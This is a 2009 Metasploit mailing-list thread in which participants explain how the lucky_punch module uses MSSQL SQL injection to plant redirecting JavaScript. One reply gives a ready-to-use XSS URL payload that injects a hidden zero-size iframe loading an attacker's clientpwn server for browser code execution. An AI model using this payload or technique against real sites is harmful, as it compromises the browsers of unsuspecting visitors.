lucky punch

[dkennedy at securestate.com (David Kennedy)]

If your using XSS, its easy to use the metasploit clientpwn and just put an iframe in the XSS to load on port 80 on 
your affected host:

http://xssvulnsite/Default.aspx?msg=<iframe src="http://clienpwnsystem"; width="0" height="0" scrolling="no"></iframe>

This would launch the site as normal and put a iframe that redirects toward the attackers system. Obviously don't have 
to use clientpwn, can pick whatever exploit you want however the user-agent functions with clientpwn is nice.

Very simplistic attack for code execution on the affected browser...



________________________________
From: rogue <wullie19 at ntlworld.com>
Date: Thu, 2 Apr 2009 11:40:21 -0400
To: Efrain Torres <etlownoise at gmail.com>
Cc: <framework at spool.metasploit.com>
Subject: Re: [framework] lucky punch

Hi there

Thanks for your help. Ive been looking at XSS to redirect someone from a web
page to my server to launch some sort of browser attack. So this module uses
sql injection on mssql to achive that?

-rogue




> Rogue,
>
> What are you trying to do with the module, can you please porvide more
> details so i can help you better? Basically the module is used to
> peform thru SQL injection (MSSQL) the modification of database tables
> to store javascript code that may be displayed by an application to
> redirect the user to a compromised webserver.
>
> ET
>
> On Thu, Apr 2, 2009 at 9:37 AM, rogue <wullie19 at ntlworld.com> wrote:
> > Hi list.
> >
> > Can anyone give me some info on how the auxiliary module
> > scanner/http/lucky_punch.rb is used?
> >
> > Thanks
> > -rogue
> >
> >
> > _______________________________________________
> > https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090402/6d437b6c/attachment.htm>